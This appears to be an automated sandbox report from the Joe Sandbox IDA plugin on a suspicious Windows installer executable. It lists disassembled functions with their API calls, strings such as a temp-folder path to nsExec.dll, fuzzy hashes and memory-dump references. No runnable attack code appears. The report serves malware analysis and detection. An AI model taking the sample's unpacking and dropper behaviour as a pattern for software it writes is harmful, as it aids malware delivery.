Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1237631032
Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD

Function 004042AE Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004042CB
GetSysColor.USER32(00000000), ref: 004042E7
SetTextColor.GDI32(?,00000000), ref: 004042F3
SetBkMode.GDI32(?,?), ref: 004042FF
GetSysColor.USER32(?), ref: 00404312
SetBkColor.GDI32(?,?), ref: 00404322
DeleteObject.GDI32(?), ref: 0040433C
CreateBrushIndirect.GDI32(?), ref: 00404346

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69

Function 00402D9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
GetTickCount.KERNEL32 ref: 00402DD8
wsprintfW.USER32 ref: 00402E06

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
ShowWindow.USER32(00000000,00000005), ref: 00402E38

Part of subcall function 00402D83: MulDiv.KERNEL32(0048C46E,00000064,004923B0), ref: 00402D98

Strings

... %d%%, xrefs: 00402E00

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
Opcode Fuzzy Hash: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE

Function 00404BAC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
GetMessagePos.USER32 ref: 00404BCF
ScreenToClient.USER32(?,?), ref: 00404BE9
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21

Strings

f, xrefs: 00404BFD

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4

Function 00402D04 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
wsprintfW.USER32 ref: 00402D56
SetWindowTextW.USER32(?,?), ref: 00402D66
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78

Strings

verifying installer: %d%%, xrefs: 00402D4B, 00402D54
unpacking data: %d%%, xrefs: 00402D44

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98

Function 00404A9E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
wsprintfW.USER32 ref: 00404B48
SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B

Strings

H7B, xrefs: 00404B31
%u.%u%s%s, xrefs: 00404B29

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll,?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E

Strings

artikulationer\Udsorteringerne, xrefs: 0040257C
C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll, xrefs: 00402552, 00402575, 00402589, 004025D5

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll$artikulationer\Udsorteringerne
API String ID: 3109718747-2373012318
Opcode ID: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
Opcode Fuzzy Hash: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
Opcode Fuzzy Hash: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769

Function 00405BE2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405BF0
